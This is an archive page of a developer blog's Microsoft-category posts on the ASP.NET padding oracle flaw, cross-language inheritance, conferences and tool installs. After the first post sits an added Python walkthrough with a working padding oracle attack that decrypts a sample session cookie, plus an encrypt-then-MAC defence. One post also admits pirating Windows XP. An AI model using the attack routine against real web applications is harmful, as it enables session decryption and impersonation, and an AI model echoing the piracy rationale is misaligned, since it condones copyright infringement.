You are currently browsing the archives for the Microsoft category


asp.net oracle padding flaw – question?

By now many of you have heard of the ASP.NET Oracle Padding Flaw. There’s a number of posted workarounds, and MS will be issuing a patch soon to fix things.

From threatpost.com:

The problem lies in the way that ASP.NET, Microsoft’s popular Web framework, implements the AES encryption algorithm to protect the integrity of the cookies these applications generate to store information during user sessions. A common mistake is to assume that encryption protects the cookies from tampering so that if any data in the cookie is modified, the cookie will not decrypt correctly. However, there are a lot of ways to make mistakes in crypto implementations, and when crypto breaks, it usually breaks badly.

The issue here seems to be that there’s *anything* of value stored in the cookie beyond a generic token.  This really does seem to be the case though.  Watching the DNN exploit, it looks like the fact that someone is a superuser is encoded in the cookie value itself.  This would seem to be an architectural flaw in DNN, but I get the feeling that most ASP.NET apps were/are trusting of the encryption mechanism to hide whatever data they’re sending down in cookies.  This seems to be a more fundamental flaw in design than any AES algorithm MS may have had an issue with.

I’m reminded of a company I worked for years ago which kept track of sessions by incrementing a counter in a DB, grabbing that counter, encrypting it, then using that value as the value in the cookie.  This was thought of as ‘secure’ because encryption was being used.  I tried to argue for random values as the cookie token, but was told that ‘random isn’t really random’.  I pointed out that dozens of people (who no longer worked there) had access to the encryption key, and once I knew how to decrypt one token – which would give me a value of, say, 4554678 – changing the value to 4554672 and re-encrypting would be trivial and would allow me to impersonate other users on the system.  My concerns were dismissed because I wasn’t a ‘senior’ engineer; apparently I didn’t understand Java or cryptography enough to understand their level of sophistication.  After all, ‘random isn’t really random’.

This approach of putting sensitive data in a cookie, then encrypting it, seems to be alive and well, and that scares me.  But I have no real good way of opting out of such sites.

So my question (yes I had one) is… is my understanding of what ASP.NET apps are doing that make this flaw so dangerous an accurate understanding?  Or have I missed something?
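The mechanism behind the flaw discussed above, as an added worked example that is not part of the original post and not Microsoft's or DNN's code: a padding oracle attack on CBC mode with PKCS#7 padding, which decrypts an encrypted-but-unauthenticated cookie using nothing but the server's accept/reject answer, followed by the encrypt-then-MAC construction that closes the hole. The block cipher is a toy Feistel network keyed through HMAC-SHA256 standing in for AES (an assumption made so the example runs with only the standard library; the attack depends on CBC and the padding check, not on the cipher), and the cookie contents, keys and all function names are constructed for the demo.

```python
import hashlib
import hmac
import os

BLOCK = 16                                          # block size in bytes
ENC, DEC = range(4), range(3, -1, -1)               # Feistel round order

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(key, block, rounds):
    # Toy 4-round Feistel cipher keyed through HMAC-SHA256; it stands in for AES
    # (an assumption), since the attack needs only CBC mode and PKCS#7 padding.
    left, right = block[:8], block[8:]
    for r in rounds:
        f = hmac.new(key, bytes([r]) + right, hashlib.sha256).digest()[:8]
        left, right = right, _xor(left, f)
    return right + left                             # final swap lets DEC undo ENC

def pkcs7_unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")             # the failure the oracle leaks
    return data[:-n]

def cbc_encrypt(key, plaintext, iv=None):
    n = BLOCK - len(plaintext) % BLOCK
    padded, prev = plaintext + bytes([n]) * n, iv or os.urandom(BLOCK)
    out = [prev]                                    # IV travels with the ciphertext
    for i in range(0, len(padded), BLOCK):
        prev = feistel(key, _xor(padded[i:i + BLOCK], prev), ENC)
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, ciphertext):
    c = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return pkcs7_unpad(b"".join(_xor(feistel(key, c[i], DEC), c[i - 1]) for i in range(1, len(c))))

def make_oracle(decrypt):
    # The server's accept/reject answer, as the attacker observes it.
    def oracle(token):
        try:
            decrypt(token)
            return True
        except ValueError:
            return False
    return oracle

def recover_block(oracle, prev, target):
    # Forge the block before `target` byte by byte, using only the oracle's yes/no.
    inter = bytearray(BLOCK)                        # D_key(target), CBC's intermediate state
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ pad              # known tail now decrypts to `pad`
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:                    # rule out an accidental 02 02 match
                probe = bytearray(forged)
                probe[pos - 1] ^= 0xFF
                if not oracle(bytes(probe) + target):
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("oracle never accepted a forgery")
    return _xor(inter, prev)

def padding_oracle_attack(oracle, ciphertext):
    c = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return pkcs7_unpad(b"".join(recover_block(oracle, c[i - 1], c[i]) for i in range(1, len(c))))

def seal(enc_key, mac_key, plaintext):
    # Encrypt-then-MAC: the tag covers the IV and every ciphertext block.
    ct = cbc_encrypt(enc_key, plaintext)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def open_sealed(enc_key, mac_key, token):
    ct, tag = token[:-32], token[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, ct, hashlib.sha256).digest()):
        raise ValueError("bad tag")                 # rejected before any padding check runs
    return cbc_decrypt(enc_key, ct)

def demo():
    enc_key, mac_key = os.urandom(16), os.urandom(16)
    cookie = b"user=42;role=superuser"              # constructed sample cookie
    leaked = padding_oracle_attack(make_oracle(lambda c: cbc_decrypt(enc_key, c)),
                                   cbc_encrypt(enc_key, cookie))
    try:
        padding_oracle_attack(make_oracle(lambda t: open_sealed(enc_key, mac_key, t)),
                              seal(enc_key, mac_key, cookie))
        outcome = "recovered"
    except RuntimeError:
        outcome = "blocked"
    return leaked, outcome
```

Calling demo() returns the full cookie text recovered from the unauthenticated version without the attacker ever holding the key, which is why anything of value in the cookie is exposed rather than merely hidden, and "blocked" for the sealed version, where every forged token fails the tag check before the padding is examined and the oracle disappears. Two details carry the fix: the tag is checked with hmac.compare_digest so the comparison itself does not become a timing oracle, and the tag covers the IV as well as the ciphertext, since the IV is exactly the block the attacker forges.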


I'm currently working on a book for web freelancers, covering everything you need to know to get started or just get better. Want to stay updated? Sign up for my mailing list to get updates when the book is ready to be released!

Web Developer Freelancing Handbook

TriNUG SharePoint group meeting

Just got done with attending the TriNUG SharePoint group meeting.  Mike Gannotti presented on how to adopt SharePoint in an organization.  Lots of good stuff, and this was far more about social media tools adoption in orgs rather than much that was specific to SharePoint.  The biggest kerfuffle tonight was Mike’s bombshell statement that “if users have to search, you’ve failed”.  Lots of good back and forth on this, although I don’t have much time to document the whole thing. 

I did ask whether SharePoint search would take into account *where* a search is initiated from.  For example, if I start a search in a particular wiki, the search should rank those wiki posts higher.  The quick answers I got were that either SharePoint does that out of the box, or it can be tuned to do that.  Seems like it would make more sense to have that as the default behaviour if it’s not.

Someone else across the room brought up that someone should be watching the search queries to see how people use the system, then tune it for future users.  This is likely something that would need to be revisited later.

Mike also talked about using scoring to help encourage participation.  Giving points to people who create content, and other points to people who engage with the content (ratings, replies, downloads), then allowing people to redeem the points for stuff (he’s getting a netbook based on this point system) is a way to get people using the system and putting in content which will be held for the long term inside the company in question.  Neat idea.  Knowing that companies are actually *doing* it is even better.  :)



PPP PHP question v2 – the humbler post

Obviously I rubbed some people the wrong way, and didn’t explain my question(s) clearly enough from the outset, then got wrapped up in taking some offense from some of the responses.  Reviewing everything today I can see where I could have responded differently, and more clearly, earlier on.  Apologies to anyone who was offended (if anyone was).

I do think the original point(s) were somewhat lost.  To the original poster who offered the banking analogy – thank you.  However, I don’t think it’s enough, and is clearly at odds with some of my other experiences with Java/Groovy.  Let me show two code samples here (assuming WP doesn’t mangle the code too much – I need to get one of those code display plugins in here!)

In Groovy (Java), if I run this:

===========================
class person {
    private email = "person email"
    protected phone = "person phone"
    public name = "person name"
    def showInfo() {
        println this.email + " " + this.name + " " + this.phone
        this.onlyInUser()   // not declared in person; Groovy resolves it at runtime
    }
}
class user extends person {
    private email = "user email"
    protected phone = "user phone"
    public name = "user name"
    def onlyInUser() {
        println "I'm in the user class definition"
    }
    def showInfo() {
        super.showInfo()
        println this.email + " " + this.name + " " + this.phone
    }
}
def u = new user()
u.showInfo()
===========================
I get this output:

===========================
person email person name person phone
I'm in the user class definition
user email user name user phone
===========================

*All* the *this* property accesses are class-bound, it seems, but the this.onlyInUser() call still calls the method in the child class.

In C# (my C# isn’t hot, but this *seems* to be a correct re-implementation of the same logic) if I run :

===========================

using System;
class person {
    public string name = "person name";
    protected string email = "person email";
    private string phone = "person phone";

    public virtual void showInfo() {
        Console.WriteLine("In the person showInfo method");
        Console.WriteLine(this.name + " " + this.phone + " " + this.email);
    }
}

class User : person {
    // `new` hides the base class fields rather than overriding them
    public new string name = "user name";
    protected new string email = "user email";
    private new string phone = "user phone";

    public override void showInfo() {
        base.showInfo();
        Console.WriteLine("In the user showInfo method");
        Console.WriteLine(this.name + " " + this.phone + " " + this.email);
    }

    // Main begins program execution.
    public static void Main() {
        User u = new User();
        u.showInfo();
    }
}

===========================

I get

===========================

In the person showInfo method
person name person phone person email
In the user showInfo method
user name user phone user email

===========================

Running seemingly equivalent code in PHP (5.2.5)
===========================
<?php
error_reporting(E_ALL);
class person {
    private $email = "private person email";
    protected $phone = "protected person phone";
    public $name = "public person name";
    public function showInfo() {
        echo $this->email." – ".$this->phone." – ".$this->name."\n";
        $this->onlyInUser();
    }
}
class user extends person {
    private $email = "private user email";
    protected $phone = "protected user phone";
    public $name = "public user name";
    public function onlyInUser() {
        echo "I'm in the user class definition\n";
    }
    public function showInfo() {
        parent::showInfo();
        echo $this->email." – ".$this->phone." – ".$this->name."\n";
    }
}
$u = new user();
$u->showInfo();
===========================
I get the following output:

===========================
private person email – protected user phone – public user name
I'm in the user class definition
private user email – protected user phone – public user name
===========================

There’s clearly a difference here, and it’s likely related to a logical difference between super and parent.  My limited Java-fu and C#-fu being what they are, I’m not able to quite grok why there’s a difference in behaviour between the examples above.

Hopefully this is humble enough to garner some collective wisdom.  I’m not bashing PHP here, nor anyone’s contributions or anything of the sort.  Simply asking – why are these behaving differently?



Getting ready for Codestock

I’m getting ready for Codestock this coming Saturday.  I’m going to be giving a talk on Grails, the Groovy/Java web framework.  I’d put together a set of slides and prepared a presentation, but I read the times wrong.  I thought I had a half hour – it’s more like 70 minutes.  So I’m having to flesh out the presentation with some more detail.

To help with that, I’ve picked up a copy of Beginning Groovy and Grails from Apress.  I saw one of the authors, Christopher Judd, at Codemash this past January.  I liked his presentation, but felt he spent too much time explaining why web development in Java was difficult in the first place, rather than just jumping in to Grails.  The book doesn’t do that as much, and I’m finding it’s a good book all around – better than I expected.  The sections on security (jsecurity, acegi, etc.) look useful – haven’t tried them yet, but anything in writing is better than where the state of Grails security docs were a few months ago :)

I also ‘led’ a small group discussion on Grails and Groovy at Barcamp RDU this past weekend.  I got to meet Shawn Hartsock in person, someone whose Groovy/Grails writings on his blog have helped me out several times.  He sat in with the group (along with Robert Fischer – a recent MN transplant) and helped explain many topics I didn’t have as much experience with.  Thanks Shawn, Robert and everyone else who showed up!

One thing that I mentioned there and I’ll mention here too – the state of Groovy and Grails marketing.  It’s not *bad*, but it’s seemingly targeted at current Java developers.  I’d say many Java devs who’ve wanted rapid dev functionality have gone on to other pastures already.  Not entirely, to be sure, and projects like Grails have probably helped keep some antsy devs squarely on home turf.  And certainly part of the attraction is the leveraging of existing Java libraries (not just under the hood but for use in userland apps as well).  There still seems to be a problem getting the word out about Groovy and Grails past the existing Java communities.  I’ll be presenting at a primarily .NET gathering this weekend, so maybe that’s a start.  I don’t expect everyone to drop whatever they’re doing just to go do Grails.  But having more people exposed to it will give them a current view of modern web app development in Java, which can’t be a bad thing (or shouldn’t be, anyway!)



Running .Net code on a JVM?

I just stumbled on this article Sunday morning.  This snippet sums up the product:

There is a way of marrying the advantages of .NET development with Java deployment. Using Mainsoft for Enterprise Edition (EE), Visual Studio developers can write code in .NET and cross-compile it to Java. Not only code, but pieces of the Framework; Mainsoft has worked with Miguel de Icaza and Novell to port pieces of the Mono project to Java. Your limits in calling Framework classes, especially for Web apps, are almost nonexistent.

Sounds very intriguing.  But, is it just a solution in search of a problem?  Would many .Net shops embrace a Java app server for deployment?  Is this too niche of a product to take off beyond a few edge cases?  Or is this sort of thing the future?

What would, I think, be more useful for many shops is to take Java code and compile it into something that targeted the .Net CLR.  Are there any projects that do this?



SQL Server driver for PHP5

For anyone who has struggled with using PHP and MSSQL over the years, this one may come as some pleasant news (if you’re still in that situation).  Microsoft put out a preview of “SQL Server 2005 Driver for PHP” back in October 2007 (yeah, I just found out this morning!).  Ehh… not as impressed as I thought I would be, in that it’s still only for PHP apps deployed on Windows.  This isn’t replacing FreeTDS any time soon.  I guess I’m still wondering what the market for “PHP apps deployed on Windows talking to SQL Server” really is – most of the shared hosting accounts I’ve seen, even on Windows, offer MySQL or Access as the database.

Scratch that – I’ve started to see SQL server as an option more recently (bit of a brain pause there a moment ago!).  This is perhaps a bit of a chicken/egg situation – if there’s a more stable driver, this may help hosting companies push SQL Server as their default DB option (perhaps eventually charging for a MySQL installation as an option?).

There’s a video of the team talking about the project here (but you’ll need silverlight to watch it!) and the team’s blog here.

Powered by ScribeFire.



MS dev tool installation woes

I’ve not done any major development work specifically inside MS Windows for a few years now, and I’ve forgotten what some of the hassles are.  Today I revisited that world, looking to play with the new ASP.NET and .NET 3.5 framework.  Whew what a hassle.  Let me start by saying I can only run Windows XP (home I think) in a VMWare environment under Linux.  My XP partition on my laptop just quit working in Oct 2006, after about 6 months of use.  When I boot up I get a screen telling me I need to reinstall from the source disks.  Given that this was a laptop, all you get is a disk which reformats your drive, or at least that’s how it looks.  I already had a linux partition on there with real data, so I quit using the XP partition altogether. 

Yes, I ‘pirated’ a version of XP for my VMWare player – I feel morally justified in doing so because the XP I paid for broke itself after 6 months of use, but technically I’ve broken some copyright law somewhere.

Given the disk space issue, I only have a 6 gig drive on the XP image, which doesn’t get you much these days.  I had Visual Studio Express 2005 (both C# and VB editions), and tried to remove one to make room for VS Web Express 2008.  No dice – it tried to uninstall for about 20 minutes, and the progress bar quit moving, so I had to kill that process, and then I couldn’t re-uninstall because it had removed the uninstall program already (or couldn’t find it), so I was left with half an installation.  I had enough disk space at that time for VBWeb2008, but it was still annoying.

So I started installing, and the installer just quit moving part way through.  Again, waiting 15 minutes and *no* progress movement on installing VSWebExpress2008 – what’s up with that?  So I cancelled, and tried to remove the .NET 2.0 library (because VSWeb will install .NET 3.5 anyway).  The .NET uninstaller wouldn’t uninstall.  Maybe I just need to leave it overnight and see if it uninstalls?  I know virtualized machines are slower, but this is just insanity – it’s not really working, but there’s no way (I know of, anyway) to get past these issues.

I’d love to try the latest .NET 3.5 stuff, but apparently I’m not cutting edge enough?  Sorry for sounding paranoid, but might this be an issue with running under VMWare?  I have no other choice right now, and I’m not going to get another machine this week just to play with stuff, but does anyone else have these problems?

Linux has its issues, no doubt.  I have problems all day long, but few that ever involve the installation of software just hanging, or software removal hanging.  Java apps on Linux are certainly no walk in the park, with path issues, various minor bugs here and there and whatnot, but at least I can get things like eclipse and netbeans *installed*.  FWIW, I didn’t have as many problems on my ‘corporate’ PC back in 2007, but I still had some, they just weren’t as fatal as these have been (so far).




Need Excel macro

Looking for an Excel macro, or whatever it’s called, that would record the time/date a row was changed into a column in that row.  That might be recursive if not handled properly.  This seems like it would just come standard in Excel – have a cell indicate the last updated time/date of something in its own row or column – but I’m not finding anything like that.  Anyone seen something like this before?

Thanks!



Latest podcast up

I had a good conversation with Joe Fiorini about balancing his daily work in .NET with a passion and enthusiasm for Ruby on Rails.  Have a listen.



Latest podcast up – Codemash Open Spaces – Open Source in .NET

I had a fun time recording this ‘open spaces’ meeting at Codemash last week.  This was led by Joe Brinkman from the DotNetNuke project, and joining us was Kevin Devine from the Euclid Public Library, Sara Ford from Codeplex @ Microsoft, Steven Harman from the Subtext project and – shoot – I do not have the contact info for the other gentleman who is on the talk. Oh wait – yes I do – Jay Wren!   The sound was *decent*, although there was a shortage of mics.  I also accidentally dropped Joe’s volume on a few occasions, but overall it felt like a great chat, so here it is.

Topics include the pros and cons of getting Contributor License Agreements in place on an open source project, building community, a bit of good natured back and forth on Microsoft’s role in all this, interesting comparisons to the Java community, and more.

BTW, this is just a sample of many of the informal chats that happen for 2 days @ codemash.  If you like these types of discussions, join us next year!

The podcast is up at http://www.webdevradio.com

